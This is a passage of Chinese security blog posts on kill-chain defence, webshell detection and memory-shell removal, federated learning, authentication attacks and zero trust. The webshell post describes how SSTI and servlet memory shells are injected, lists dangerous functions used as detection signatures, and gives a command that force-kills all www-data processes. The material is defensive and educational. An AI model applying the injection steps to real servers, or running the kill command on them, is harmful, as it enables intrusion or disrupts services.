利用威胁情报，匹配访问访问源、身份等信息。

2、武器构建阶段

虽然防护者在攻击者发起攻击之前无法检测武器化的信息，但这一阶段仍然很重要。随着威胁情报服务商的出现，防护者可以使用威胁情报跟踪恶意软件的发展，从而为选择网络安全合作伙伴提供输入，对可能出现的恶意软件进行推测，从而节约后续部署拦截工具的时间，实现高效拦截。另外，由于恶意软件的研发者的知识、习惯通常有一定的模式，对恶意软件开发者进行研究，也可以为拦截恶意软件提供信息。防护者可以采取的行动包括：

分析恶意软件，研究恶意软件工作原理；
分析恶意软件，分析恶意软件开发者行为习惯和模式；
分析恶意软件的时间线，推断使用者的专业能力；
利用威胁情报，判断APT攻击。

3、载荷投递阶段

对于防护者而言，这是最重要的阶段，也是进行拦截的第一个阶段，这个阶段也是衡量一个企业的网络安全有效性的重要指标，即是否能够在交付阶段对攻击者进行有效拦截。在这一阶段，防护者的活动可以包括：

分析载荷投递的手段，例如：钓鱼邮件、U盘等；
分析载荷投递的启动时间；
分析被攻击的人员、设备/设施信息；
推断恶意软件制作者；
推断攻击者的目标物以及攻击者；
收集攻击信息，用于未来可能出现的司法阶段。

4、突防利用阶段

在这一阶段，如果攻击者采用0-day攻击，对于防护者是个挑战，但对于非0-day攻击，防护者应当注意传统的安全防护措施还是非常有效的。在此前提下，防护者能够做的是尽量利用传统的加固措施增加防护措施的弹性，通过以纵深防御思路为基础的框架，增加补偿性安全措施，对目标物进行防护。防护者可以采取的行动包括：

采用最小权限原则；
采用权限冲突/约束机制；
定期进行漏洞扫描；
定期进行渗透测试，包括外部渗透测试和内部渗透测试；
关注开发安全和所交付的软件的安全性；
安全意识的培养。

5、安装植入阶段

在安装阶段，防护者可以通过对终端设备的日志进行分析来发现潜在的威胁，并在此阶段分析恶意软件，以优化终端设备的保护。在该阶段，防护者可以采取的行动包括：

使用基于主机的IPS；
检测可能出现恶意软件的介质；
在检测到恶意软件时告警，并进行必要的拦截；
进行权限管理，分析恶意软件所需的最小权限；
对可执行文件进行签名管理；
分析恶意软件属性，包括版本、编译时间等；
使用威胁情报加强未知威胁的防护，例如：恶意软件的MD5、SHA1、SHA256等。

6、通信控制阶段

通信控制阶段是防护者进行拦截的最后一个机会，一旦让攻击者通过C2阶段，将会给企业带来直接损失。在本阶段，防护者的目的是对C2通道进行阻断，使得攻击者无法向攻击目标物的恶意软件发出相应指令，从而做到对目标物的防护。在该阶段，防护者可以实施的活动包括：

采用白名单/黑名单等措施加强网络访问控制；
分析恶意软件，从而发现C2的来源设施，并并进行反制；
采用代理机制进行通信，例如：http、DNS等。

7、达成目标阶段

攻击者对受害者的访问的时间越长, 受害者的损失就越大。受害者在这一阶段需要评估其损失，并评估使用司法手段的必要性，为司法取证采集必要的信息（例如：日志、数据流）。受害者可以采取的活动包括：

检测数据泄漏；
检测未授权使用；
评估企业损失；
采集日志；
检测横向移动；
采集网络流信息；
重现攻击；
采取司法手段；
优化应急响应、网络安全策略、流程、技术。

四、企业入侵事件案例

本文从网络杀伤链的视角对一起典型的企业入侵事件进行分析。

1、侦察跟踪阶段

2、武器构建阶段

3、载荷投递阶段

4、突防利用阶段

5、安装植入阶段

6、通信控制阶段

7、达成目标阶段

阅读原文

跳转微信打开

Webshell检测方法

Tue, 04 Jan 2022 11:48:00 +0800

原创 c3cili4 2022-01-04 11:48

一、Webshell概述

Webshell是基于Web的一种应用程序，可以将其视为可在服务器上执行的一种远程访问工具或后门木马文件。Webshell作为一种web后门，通常由攻击者通过常见的Web网站漏洞，如sql注入、文件包含和上传等，上传到服务器，从而为攻击者提供与服务器端进行交互的能力。

根据Webshell的代码长度不同，通常可以将其分为大马、小马和一句话木马。小马通常只有几行甚至一行代码，实现的功能较为单一，如文件传输和权限提升等，攻击者通常将其用作跳板，绕过上传文件大小限制来上传功能更多的大马，大马是具有完整入侵功能的Webshell，它们的体积要大得多，具有用于文件操作，命令执行和数据库连接的友好图形用户界面，它们通常会调用系统功能，以便利用混淆技术来隐藏功能用于逃避检测。一句话木马一种特殊的小马，通常只有一行代码，但其使用场景丰富，可插入其他文件中，隐匿性强，可变形免杀。

Webshell的特点主要有：

存在系统调用的命令执行函数，如eval，system，cmd_shell，assert等；
存在系统调用的文件操作函数，如fopen、fwrite、readdir等；
存在数据库操作函数，调用系统自身的存储过程来连接数据库操作；
具备很深的自身隐藏性、可伪装性，可长期潜伏到web源码中；
衍生变种多，可通过自定义加解密函数、利用xor、字符串反转、压缩、拼接等方法来绕过检测；
访问ip少、访问次数少、页面孤立、传统防火墙无法进行拦截，无系统操作日志记录；
连接webshell的payload流量会记录在web日志中。

二、Webshell检测方法

1、静态特征匹配

静态特征匹配的检测方法通过提取大量已知的Webshell的文件特征，如关键字、高危函数的调用等，通过构建规则库，利用规则匹配或相似性计算方法等实现Webshell的检测，常见的web查杀安全工具D盾使用的就是这种检测方法。此外，还会将已知的Webshell的MD5值保存在特征库中，在检测时对待检测文件进行MD5值的计算，并与特征库进行比较查看是否匹配。

但这种方法常常无法检测到经过加密、编码、拼接等混淆手段的Webshell变形。如下图的代码是经过base64编码混淆后的 Webshell变形，使用静态的检测方法难以对其进行检测。

2、基于统计特征的检测

由于Webshell往往经过了编码和加密，与常规的文件相比，会有一些特别的统计特征，可以根据这些特征统计进行检测。这类检测方法的典型代表: NeoPI （ https://github.com/Neohapsis/NeoPI ）

NeoPi使用以下五种特征进行检测：

信息熵(Entropy):通过使用ASCII码表来衡量文件的不确定性，通常经过混淆的Webshell文件信息熵更大；
最长单词(LongestWord):最长的字符串也许潜在的被编码或被混淆；
重合指数(Indexof Coincidence):低重合指数预示文件代码潜在的被加密或被混淆过；
特征(Signature):在文件中搜索已知的恶意代码字符串片段；
压缩(Compression):对比文件的压缩比，Webshell文件压缩比通常比正常文件低；

NeoPi的检测重心在于识别混淆代码，适用于检测经过混淆的Webshell。

3、基于日志的检测

基于日志的检测方法是在攻击发生之后，通过分析大量日志信息，对攻击进行溯源，是在web服务器被入侵之后进行排查的手段。由于攻击者成功上传Webshell后，会通过80端口访问Webshell文件来完成各类恶意操作，因此攻击者对Webshell的访问会被记录在web日志中，通过整合在系统各处的日志，可以对其进行分析，区分正常web网页和Webshell在日志文件中的不同特征，检测是否存在Webshell。

由于Webshell有以下访问特性：1）少量ip对其发起访问；2）总的访问次数少；3）通常Webshell属于孤立页面，可将其用于日志分析中。但由于日志的多样性和复杂性，该方法有可能会产生大量的误报，并且由于日志数量的庞大，大量读写日志很可能会对服务器的性能造成影响。

4、基于流量的检测

基于流量特征的检测是动态检测的一种方法，该方法主要是对网络流量进行抓包与分析，通过区分恶意流量和正常流量，从而检测是否存在Webshell。目前国内外的很多入侵检测和入侵防御系统都采用了这种方法。

基于流量的特征检测虽然能够较好地识别恶意流量，但由于流量信息的庞大，实时监测的难度较大，对系统的吞吐量要求高，很容易产生流量数据包丢失等问题而对检测结果产生一定的影响。

5、基于行为特征的检测

基于行为的分析检测也是目前常用一种的动态检测Webshell的手段，在入侵检测中应用广泛，该方法通过对恶意代码的行为进行捕捉与分析，检测异常行为，从而进行恶意代码的识别。

RASP产品就使用了这一检测方法，通过插桩等技术在应用程序运行过程中对执行危险操作的函数进行hook，检查其执行的参数，从而检测并阻止恶意代码运行。

php类型的Webshell检测一般通过php扩展对opcode进行hook，jsp类型的Webshell检测一般通过java agent的方式实现字节码的动态修改，从而对恶意行为进行检测。

三、内存马查杀

1、内存马的分类

2、php内存马

将该段代码上传至php服务器并访问，会在同一目录下循环生成shell.php的一句话木马文件。其查杀方式有：

1）在条件允许情况下，重启服务器；

2）kill掉www-data用户所有子进程：ps aux | grep www-data | awk '{print $2}' | xargs kill -9

3、python flask内存马

Python内存马可利用flask框架中ssti注入来实现，flask框架中在web应用模板渲染的过程中用到render_template_string()进行渲染但未对用户传入的参数进行过滤，就可以通过注入恶意代码来实现python内存马的注入。以下payload利用ssti注入注册了一个/shell的路由，路由对应的逻辑为执行cmd参数值命令。

查杀方式：找到恶意路由并删除或重启服务器。

4、java内存马

在java web中，客户端发起的web请求会依次经过Listener、Filter、Servlet三个组件，只要在这个请求的过程中做手脚，在内存中修改已有的组件或者动态注册一个新的组件，插入恶意的shellcode，就可以注入内存马。

根据内存马注入的方式，大致可以将内存马划分为以下两类：

1）servlet-api型：通过命令执行等方式动态注册一个新的listener、filter或者servlet，从而实现命令执行等功能。特定框架、容器的内存马原理与此类似，如spring的controller内存马，tomcat的valve内存马

2）agent型：通过java的instrumentation动态修改已有代码，进而实现命令执行等功能。

本文主要以Servlet内存马为例来介绍其原理和查杀方式。

Servlet内存马

Servlet 是运行在 Web 服务器或应用服务器上的程序，它是作为来自 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。它负责处理用户的请求，并根据请求生成相应的返回信息提供给用户。

在注入内存马的过程当中，可能需要用到反射机制，例如注入一个servlet型的内存马，需要使用反射机制来获取当前的context，然后将恶意的servlet添加到当前的context的children中。

servlet内存马注入过程如下：首先创建一个恶意的servlet，然后获取当前的StandardContext；再将恶意servlet封装成wrapper添加到StandardContext的children当中，最后添加ServletMapping将访问的URL和wrapper进行绑定。

执行上述操作后，访问指定的URL路径就可以进行命令执行了。

以哥斯拉的servlet内存马为例，在getshell后生成servlet内存马并绑定指定的url进行注入，接着就可以直接使用绑定的url进行内存马的连接。

Java内存马检测工具

（1）java-memshell-scanner

通过jsp扫描应用中所有的filter和servlet，然后通过名称、对应的class是否存在来判断是否是内存马

通常内存马的恶意servlet和filter等式动态注册的，在ClassLoader目录下没有对应的class文件

（2）cop.jar工具

可以识别异常的类，在结果中会显示所有运行的类以及危险等级，比较高的可以进入目录查看代码进行分析，在java目录下或class文件夹下会保存木马以及运行的类，可以用D盾等webshell查杀工具进行扫描。

（3）arthas-boot.jar工具

是阿里开源的Java诊断工具，可以实时监控jvm状态。mbean命令可查看可疑的servlet和filter节点，sc命令可以查看JVM已加载的类信息，若有可疑的类，可通过jad命令反编译得到源码进行排查。

四、总结

总的来说，无论是常见的Webshell，还是经过加密、编码、拼接等混淆的Webshell变形、内存马等，都需要利用Web应用的各种漏洞进行上传，如命令执行、反序列化RCE、文件上传等等，Webshell一旦被上传，无论通过流量、文件特征进行检测并查杀，都只是应急手段，无法从根源上防止攻击。

因此，最好的防护方法就是加强边界防护，减少暴露在外的应用漏洞。但是目前0day漏洞频出，边界突破手段防不胜防，因此，许多安全厂商和互联网大厂都在研究RASP技术，该技术通过注入应用程序内部实现安全防护，对比其他检测方法来说，它可以在程序通过Webshell执行恶意命令前对其进行检测和阻断，但该技术的应用目前仍在起步阶段，未来随着RASP技术的发展，针对Webshell的检测与防护可能会有新的突破。

阅读原文

跳转微信打开

联邦学习——打破数据孤岛，建立安全的数据生态

Wed, 08 Dec 2021 09:50:00 +0800

Q、嘉壹 2021-12-08 09:50

我们正处在万物互联的人工智能时代，大数据驱动的人工智能推动着各个行业快速发展，但是事实上在大多数行业中，数据是以孤岛的形式存在的，联邦学习技术，能够在数据孤岛之间架设桥梁，成为在满足数据安全下解决数据孤岛的一个可行方案。

一、联邦学习背景和意义

我们正处在万物互联的人工智能时代，大数据驱动的人工智能推动着各个行业快速发展，但是事实上在大多数行业中，数据是以孤岛的形式存在的，由于隐私保护、行业竞争、数据资产利益冲突等诸多问题，使得同行业下不同公司甚至是同公司不同部门之间的数据整合成为难题。联邦学习技术，能够在数据孤岛之间架设桥梁，成为在满足数据安全下解决数据孤岛的一个可行方案。

二、联邦学习概述

2.1 联邦学习的定义

联邦学习是一种机器学习技术。传统的机器学习需要将客户端的数据上传至服务器进行训练，用户数据的隐私成为了一个大问题。在联邦学习中服务器端将训练程序下发到客户端，客户的数据就在客户端计算下降的梯度和损失，或者是模型的参数，并上传至服务器，服务器将来自各个客户端的数据整合，更新模型的参数，这样就完成了训练的一次迭代，经过若干次迭代之后模型训练成功。即数据不出本地的情况下，各方进行数据联合训练，建立共享的机器学习模型。

2.2 联邦学习的特点

各方数据都保留在本地，不泄露隐私也不违反法规；
各个参与者联合数据建立虚拟的共有模型，并且共同获益的体系；
在联邦学习的体系下，各个参与者的身份和地位相同；
联邦学习的建模效果和将整个数据集放在一处建模的效果相同，或相差不大；
迁移学习是在用户或特征不对齐的情况下，也可以在数据间通过交换加密参数达到知识迁移的效果。

2.3 联邦学习在机器学习技术中的地位

将机器学习按照是否进行隐私保护的维度进行划分，集中式机器学习的代表是基于硬件的TEE（可信执行环境），其技术实现被叫做SGX（英特尔实现）。基于硬件的技术是在CPU的层面上进行加密和解密，要求数据持有方将数据送入物理机集群中。分布式机器学习有两种技术路线，为了保护数据隐私，第一种方案是加密原始数据后进行运行，无论后续如何操作，底层数据均不可见。第二种思路是加密中间结果，由于原始数据集可能会很大，加解密过程长导致运算效率会很低。所以不加密原始数据，而是加密两个机器学习算法进行交换的中间结果。通过加密中间结果的方式来隐藏原始数据，这就是联邦学习的主要思想。

2.4 联邦学习对加密技术的使用

目前，主流的联邦学习多用同态加密技术。同态加密的主要思路是需要把未加密的数据送到运算方，但想在运算方不知道数据具体内容的前提下，让其对数据进行运算。在同态加密中，对经过同态加密的数据进行处理得到一个输出，将这一输出进行解密，最终其结果与用同一方法处理未加密的原始数据得到的输出结果是一样的。也就是说同态加密是一种不需要访问数据本身就可以加工数据的方法

同态加密

图中，用Alice和Cloud模拟云场景下的同态加密过程。

Alice对数据进行加密。并把加密后的数据发送给Cloud；

Alice向Cloud提交数据的处理方法，这里用函数f来表示；

Cloud在函数f下对数据进行处理，并且将处理后的结果发送给Alice；

Alicex对数据进行解密，得到结果。

严格来说，目前实现的联邦学习只能称作半同态加密，F只能实现加法（全同态要求F还能实现乘法)

三、联邦学习分类

我们将以孤岛数据的分布特点为依据对联邦学习进行分类。考虑有多个数据拥有方，每个数据拥有方各自所持有的数据集 D_i 可以用一个矩阵来表示。矩阵的每一行代表一个用户，每一列代表一种用户特征。同时，某些数据集可能还包含标签数据。如果要对用户行为建立预测模型，就必须要有标签数据。我们可以把用户特征叫做 X，把标签特征叫做 Y。比如，在金融领域，用户的信用是需要被预测的标签 Y；在营销领域，标签是用户的购买愿望 Y；在教育领域，则是学生掌握知识的程度等。用户特征 X 加标签 Y 构成了完整的训练数据（X，Y）。但是，在现实中，往往会遇到这样的情况：各个数据集的用户不完全相同，或用户特征不完全相同。具体而言，以包含两个数据拥有方的联邦学习为例，数据分布可以分为以下三种情况：

两个数据集的用户特征（X1,X2,…）重叠部分较大，而用户(U1, U2…)重叠部分较小；
两个数据集的用户(U1, U2…)重叠部分较大，而用户特征（X1,X2,…）重叠部分较小；
两个数据集的用户(U1, U2…)与用户特征（X1,X2,…）重叠部分都比较小。

为了应对以上三种数据分布情况，我们把联邦学习分为横向联邦学习、纵向联邦学习与联邦迁移学习。

横向联邦学习

在两个数据集的用户特征重叠较多而用户重叠较少的情况下，我们把数据集按照横向(即用户维度)切分，并取出双方用户特征相同而用户不完全相同的那部分数据进行训练。这种方法叫做横向联邦学习。比如有两家不同地区银行，它们的用户群体分别来自各自所在的地区，相互的交集很小。但是，它们的业务很相似，因此，记录的用户特征是相同的。此时，就可以使用横向联邦学习来构建联合模型。Google 在 2017 年提出了一个针对安卓手机模型更新的数据联合建模方案：在单个用户使用安卓手机时，不断在本地更新模型参数并将参数上传到安卓云上，从而使特征维度相同的各数据拥有方建立联合模型的一种联邦学习方案。

纵向联邦学习

在两个数据集的用户重叠较多而用户特征重叠较少的情况下，我们把数据集按照纵向（即特征维度）切分，并取出双方用户相同而用户特征不完全相同的那部分数据进行训练。这种方法叫做纵向联邦学习。比如有两个不同机构，一家是某地的银行，另一家是同一个地方的电商。它们的用户群体很有可能包含该地的大部分居民，因此用户的交集较大。但是，由于银行记录的都是用户的收支行为与信用评级，而电商则保有用户的浏览与购买历史，因此它们的用户特征交集较小。纵向联邦学习就是将这些不同特征在加密的状态下加以聚合，以增强模型能力的联邦学习。目前，逻辑回归模型，树型结构模型和神经网络模型等众多机器学习模型已经逐渐被证实能够建立在这个联邦体系上。

联邦迁移学习

在两个数据集的用户与用户特征重叠都较少的情况下，我们不对数据进行切分，而可以利用迁移学习来克服数据或标签不足的情况。这种方法叫做联邦迁移学习。比如有两个不同机构，一家是位于中国的银行，另一家是位于美国的电商。由于受到地域限制，这两家机构的用户群体交集很小。同时，由于机构类型的不同，二者的数据特征也只有小部分重合。在这种情况下，要想进行有效的联邦学习，就必须引入迁移学习，来解决单边数据规模小和标签样本少的问题，从而提升模型的效果。

四、联邦学习框架

以包含两个数据拥有方（企业A和企业B）的场景为例，出于数据隐私和安全考虑，A 和 B 无法直接进行数据交换。此时，可使用联邦学习系统建立模型，系统架构由两部分构成，如下图所示。

第一部分：加密样本对齐。由于两家企业的用户群体并非完全重合，系统利用基于加密的用户样本对齐技术，在 A 和 B 不公开各自数据的前提下确认双方的共有用户，并且不暴露不互相重叠的用户。以便联合这些用户的特征进行建模。

第二部分：加密模型训练。在确定共有用户群体后，就可以利用这些数据训练机器学习模型。为了保证训练过程中数据的保密性，需要借助第三方协作者 C 进行加密训练。以线性回归模型为例，训练过程可分为以下 4 步：

协作者 C 把公钥分发给 A 和 B，用以对训练过程中需要交换的数据进行加密；
A 和 B 之间以加密形式交互用于计算梯度的中间结果；
A 和 B 分别基于加密的梯度值进行计算，同时 B 根据其标签数据计算损失，并把这些结果汇总给 C，C 通过汇总结果计算总梯度并将其解密；
C 将解密后的梯度分别回传给 A 和 B；A 和 B 根据梯度更新各自模型的参数。

迭代上述步骤直至损失函数收敛，这样就完成了整个训练过程。在样本对齐及模型训练过程中，A 和 B 各自的数据均保留在本地，且训练中的数据交互也不会导致数据隐私泄露。因此，双方在联邦学习的帮助下得以实现合作训练模型。

第三部分：效果激励。联邦学习的一大特点就是它解决了为什么不同机构要加入联邦共同建模的问题，即建立模型以后模型的效果会在实际应用中表现出来，并记录在永久数据记录机制（如区块链）上。提供的数据多的机构会看到模型的效果也更好，这体现在对自己机构的贡献和对他人的贡献。这些模型对他人效果在联邦机制上以分给各个机构反馈，并继续激励更多机构加入这一数据联邦。

以上三个步骤的实施，即考虑了在多个机构间共同建模的隐私保护和效果，又考虑了如何奖励贡献数据多的机构，以一个共识机制来实现。所以，联邦学习是一个“闭环”的学习机制。

五、联邦学习应用实例

要平衡数据孤岛与数据隐私之间的关系是联合建模面临的挑战。从图中可以看到，联合建模的效果最好，但是隐私保护的难度最高。定制和通用建模比较简单，但是精度一般。联邦学习综合了两方的优点，可以在有效保护隐私的前提下达到较好的模型效果，且模型难度较低。

微众银行FATE模型

图为微众银行FATE联邦学习模型原理架构图，微众银行和腾讯进行联合建模，在底层是无法进行数据交互的。在进行联邦学习之前，双方需要先对齐样本，而后通过同态加密共享中间结果。如此以来，双方的数据不需要出私有域，也更好地保护数据安全。而且整个操作是远程的，无需驻场，高效便捷，能够实现模型的快速迭代。

六、未来展望

基于联邦学习的智能风控有利于促进基于数据安全联合建模的AI技术应用落地，更好地支撑消费金融行业的价值创造，并提升此类行业的风险控制能力。同时可以通过联邦学习提升金融科技公司对金融机构各项业务的服务能力。目前，联邦学习已实现可参与至风控流程各环节，包括反欺诈、白名单初筛、信贷预审、贷中和贷后预警评分等，根据业务企业及机构需求，可进行多维度合作。后续，联邦学习将通过深入信贷风控审核主流程，进一步用联邦建模渗透到信审各环节，实现数据隐私保护下的数据连接及合作。

阅读原文

跳转微信打开

身份鉴别浅析

Thu, 02 Dec 2021 18:42:00 +0800

兰博 2021-12-02 18:42

身份鉴别的目的是向参与方证明自己的身份，而基于鉴别的结果，可以信息共享、实现授权管理和访问控制，这些在日常生活中都不可或缺。身份鉴别技术是用户数据和隐私保护的第一道防线，防止未经授权，对数据和账户的访问。

一、概念

鉴别（Authentication）常与另外两个词认证（Certification）和标识（Identification）一起被提起，三者经常被混淆使用。认证是证实某特定实体具有某种或某些属性，更进一步是证实某个属性到达一定预设程度，是三方的交易；标识是在一定范围内，唯一能够区分各个实体的命名体系或方法，标识是认证的产出，例如身份证、设备ID等；鉴别通常指身份鉴别，即，获知通信对方的身份标识并验证的过程，是两方的交易。在中文环境中，有时候也用“身份认证”来表示“身份鉴别”。进一步，有数据源鉴别，即，在通信过程中，获知数据生成方或发送方的身份标识并验证的过程。

二、身份鉴别方式

身份鉴别主要利用something you have、something you know、something you are这三个方面实现，常见的身份鉴别有口令鉴别、SocialAuthenticcation、生物特征鉴别、基于可信设备的身份鉴别和多因素身份鉴别等。口令鉴别的方式有两种，一种是熟悉的数字口令、另一种是图形口令，口令鉴别的安全性依赖于口令的保密性和复杂度，很容易遭受弱口令攻击、暴力破解攻击、涂抹攻击和肩窥攻击等。Sosial鉴别是通过关联的社交人际关系对用户进行身份鉴别，比如当微信被锁时，需要几个好友发送消息帮忙解锁，这样的鉴别方式使得这种身份鉴别方法的适用范围很小。FiDO U2F鉴别器、智能卡和早期的USB-Key等这些需要额外硬件设备的身份鉴别方式被统一归类到基于可信设备的身份鉴别。生物特征鉴别方式是利用用户独一无二的生物特征来鉴别用户身份，常见的有大家熟知的指纹、虹膜和面部识别，这些都属于生物特征鉴别里的生理特征鉴别方式。近两年，由于持续性身份鉴别逐渐受到重视，行为特征用于身份鉴别也被人熟知，虽然行为特征的身份鉴别准确率比生理特征低，但是不需要额外的硬件设备，可以持续性的鉴别也是行为特征的优势。

三、常见攻击方法

针对身份鉴别，常见的攻击类型有被动攻击、主动攻击、暴力破解攻击、字典攻击、重放攻击、中间人攻击和并行会话攻击等。

Ø被动攻击

u攻击者无法与通信任一参与方交互

u攻击者可以根据获取到的通信数据破坏通信过程

Ø主动攻击

u攻击者可以干涉通信，改变会话内容

u 攻击者可能创建、伪造、更改、替换、阻止或重放通信会话内容

Ø暴力破解攻击

u通过猜测可能构成密码的所有组合，测试密码的正确性

u 随着密码的长度增加，找到正确密码的时间开销也会逐步增加

Ø字典攻击

u相比于暴力破解攻击，字典攻击的猜测范围更精准（常见弱口令、系统/设备默认口令）

u成功率较高，因为很多人的密码习惯使用单一、简单的密码

Ø重放攻击

u恶意重复或延迟有效数据

Ø中间人攻击

u攻击者恶意重放甚至改变双方之间的通信内容，让通信双方误以为他们正在直接通信

Ø并行会话攻击

u同时执行两个或多个会话

u从一个会话中截取到的信息被用于另一个会话中

针对多个身份鉴别协议的一系列攻击，需要制定一套安全标准以避免此类攻击，我们用基本的协议来举例说明。协议2-1允许B对A进行身份验证；中间人攻击、重放攻击。协议2-2允许相互认证；A、B的动作都是相同的操作，所以很好重放，就可以让A帮攻击者解密信息。修改2-2为协议2-3，A必须证明他有能力解密当前值；B必须证明他有能力加密，入侵者不能再将一方误用为oracle“解密服务器”，但是，当A的服务器支持双向鉴别，可同时作为发起/响应方，并且每一个会话使用单独的TCP处理线程，通常而言线程之间不会相互比较，2-3会受到并行会话攻击。

协议2-3中能被并行会话攻击的原因是对N1和N2的加密操作是相同的，即N1与E(N1)的关系，和N2与E(N2)的关系相同，所以在由A启动的协议中运行的值可以用于由B启动的协议运行，不同方向的加密表达式必须是非对称的，协议2-4中，引入异或操作，作为发起方or响应方，能力/动作不一样，即N1与E(N1 xorB)的关系，不同于N2与E(N2)的关系。

但其实，2-4换汤不换药，也很容易被利用，异或操作的特性导致攻击能够成功。

四、移动设备近距离身份鉴别

这些基本协议，又是怎么用在实际应用的呢？随着移动设备用户的普及，移动设备之间的交互也越来越频繁。这些交互一般有有线和无线两种方式，使用有线进行交互要求用户在通信时必须携带数据线，且由于市场上移动设备的种类有很大差异，数据线的接口适配范围也需要考虑，可适用性较差。相比这种方式，利用无线（例如移动网络数据、wifi和蓝牙）进行移动设备之间的通信，成本低，不需要额外的硬件，是比较经济实用的通信方式。

然而，由于连接是无线的，设备之间无法确定与之相连的目标设备的身份，攻击者可以冒充目标设备与另一个目标设备通信，即身份欺诈。为了避免身份欺诈，需要对移动设备进行身份鉴别。

近距离身份鉴别中，通过邻近的共同无线电环境（RSS、CSI）来确认两个设备处于相似环境，但是该方案需要丰富的环境信号变化，可能需要配置定制的收音机来感知额外的信号。可以利用蓝牙、WiFi来测试移动设备之间的距离，证明两个设备的物理邻近性，达到两个设备之间的身份鉴别的目的，但是由于蓝牙或WiFi通讯范围是米级别的，只能实现粗粒度的身份鉴别。当两个设备近距离身份鉴别时，最常采用的是NFC技术，但是很移动设备通常没有内置NFC芯片。利用用户对移动设备的一些行为产生的行为数据对设备进行身份鉴别，结合密钥生成协议生成会话密钥，不需要任何额外硬件、也不容易受到肩窥攻击，密钥熵值也比较高，是适用范围广、经济实用的一种新兴移动设备身份鉴别方式。

2015年LiLingjun（A Proximity Authentication Systemfor Smartphones，TDSC 2015）等人提出了用于近距离移动设备在无线网络中通信时新的身份鉴别方式，主要思想是将两个移动设备并列，在屏幕上滑动手指，获得相似手指移动轨迹，利用屏幕上的传感器在两个设备上获得两组原始数据，由于两个手指在同一只手上，所以峰值之间的时间间隔比较相近，在做了大量统计分析后，得出相邻峰值之间的时间间隔在【0，130】之间，其中在【0，48】之间最为集中，而右下角这张图是两个移动设备上获得的峰值时间差对比情况，黄色条表示同一设备上获得时间差的差异，小于3的占82.97%，而在不同设备上时间差的差异是绿色条，小于3的占74.73%。这样获取到的两个设备上的原始特征即时间差无法完全相同，无法直接作为共同特征对两个设备进行身份鉴别。

因此，LiLingjun等人引入了特征协商来计算共同特征。左下角这张图就是特征协商中比较关键的一步，前面说到，两个移动设备获取的原始特征之间差值3，假设Alice的一个原始特征为ai，扩展这个特征成7个特征，构成对应特征子集，将扩展后的每个值哈希后发送给Bob，Bob把自己的特征b哈希后对比特征子集哈希，如果有相同的哈希，则留下对应的原始特征作为共同特征，发送对应的哈希给Alice，由于Alice有所有扩展特征的哈希，所以Alice也能获得收到的哈希值对应的特征值，最后，Alice和Bob获得相同的特征集。转化为字符串w，用于生成会话密钥，这密钥协商协议其实是DH密钥协商协议的变体，原始的DH很容易遭受中间人攻击，加入了字符串w后，可以有效抵抗中间人攻击。Alice和Bob就可以用协商好的会话密钥进行通信。

阅读原文

跳转微信打开

零信任体系基础

Wed, 22 Sep 2021 10:02:00 +0800

瓦力 2021-09-22 10:02

1.零信任产生背景

传统网络往往通过物理位置的方式来判断威胁，网络类型被分为内网和外网两大类，人们认为内网网络是安全的，而外部网络是危险的。但随着信息技术不断更新迭代，像云计算、大数据等高新技术加速信息化的发展，这种由物理上所划分的安全边界将逐步瓦解。很多的应用信息操作、访问都是由员工从外部网络发起的。但业务与信息化发展融合越紧密，其暴露的风险面就越广，人员通过网络访问后台应用系统，如果单纯依靠防火墙、入侵防御，只能检测到流量内容的安全性，但对于其身份ID、操作行为却无法做鉴别。

信息化安全建设的源头是业务访问者，若缺少对身份的认证、授权、审计等流程，数据泄露、破坏等事件就会层出不穷。例如，微盟删库事件、微博五亿用户数据泄露事件，以及典型的银行后台开发运维人员利用个人岗位权限进行不当牟利的案例。在这一背景下，零信任概念应运而生。

2.零信任体系基础

a)定义

需要指出的是，零信任并非指某种单一的安全技术或产品，而是一种网络安全防护理念，基于这一理念，零信任体系的建设逐渐被提上各企业的日程。

b)零信任访问模型

当用户需要访问企业资源时，必须通过策略决策点（PDP）和相应的策略执行点（PEP）授予访问权限。在这一过程中，零信任系统中必须确保用户身份是真实的，请求是有效的。PDP/PEP通过适当的判断，才允许企业主体访问资源。这意味着零信任适用于两个基本领域：身份认证和授权。

可以说，零信任是围绕PDP/PEP对资源保护提供的一套原则和概念，因此，在部署中，尽可能将PDP/PEP设置到距离企业资源更近的位置。目的是更明确地对构成企业的所有用户、设备、应用程序和工作流程进行身份验证和授权控制。

c)零信任体系部署原则

所有数据源和计算服务都被视为企业资源；
无论网络位置如何，所有通信都应该是安全的；
对单个企业资源的访问是在每个会话的基础上授予的；
对资源的访问由动态策略决定，包括客户端标识、应用程序和请求资产的可见状态，以及其他行为属性；
企业应确保所拥有的资产和相关的设备均处于最安全的状态，并持续监控以确保资产处于最安全的状态；
所有资源的身份验证和授权都是动态的，并且在允许访问之前必须严格执行；
企业应尽可能多地收集网络基础设施和通信系统当前的状态信息，以提升其网络安全状况。

d)零信任体系组成

图一

零信任体系主要包括两个部分：核心逻辑组件以及辅助系统。

构成零信任体系的逻辑组件很多，最核心的还是策略决策点和策略执行点。这些组件可以通过本地服务或远程服务的方式来操作，组件间的相互关系如图一所示。策略决策点被分解为两个逻辑组件：策略引擎( Policy Engine , PE)和策略管理员(Policy Administrator, PA )。零信任体系逻辑组件之间通过一个单独的控制平面进行通信，而应用程序数据则在一个数据平面上进行通信。

e)零信任体系核心逻辑组件

图二

核心逻辑组件如图二所示，除策略管理员、策略引擎和策略执行点，还包括驱动策略引擎的零信任算法。

图三

若将策略引擎视为零信任体系的大脑，那么策略引擎的信任算法就是主要的思想过程。策略引擎从多个来源获取输入，如图三所示，输入包括用户信息、设备信息、设备状态、访问信息、行为属性以及外部威胁情报等。

算法过程的设计可以通过信息属性度量、静态规则匹配，与相应基准值进行比较，计算其偏差，汇总分析所得的风险，从而得到该次访问的信任等级，然后结合所要访问资源的属性进行最终的判断，基准值可以动态调整。也可以使用神经网络、深度学习等启发式方法，先将输入的系统状态数据的特征提取出来，然后不断学习训练，从而建立起信任评估模型，进而输出模型评估后的信任等级，输出结果也可以对模型的计算过程进行反馈，从而提升模型输出结果的准确性，。

最后，根据信任等级来确定主体的访问权限，并将最后的决定传递给策略管理员来执行。

f)零信任体系辅助系统

除了实现零信任体系的核心逻辑组件之外，还有几个数据源产生的辅助系统，将数据源提供给策略引擎作为访问决策的输入和策略规则。具体包括：

持续诊断和缓解系统
威胁情报系统
数据访问策略
公钥基础设施
网络活动日志系统
身份标识管理系统
安全信息和事件监控系统

3.零信任体系设计

接下来从现实的角度来阐述零信任安全体系总体的构建方案。

a)设计思路

通常，零信任体系的设计遵循以下三个思路：

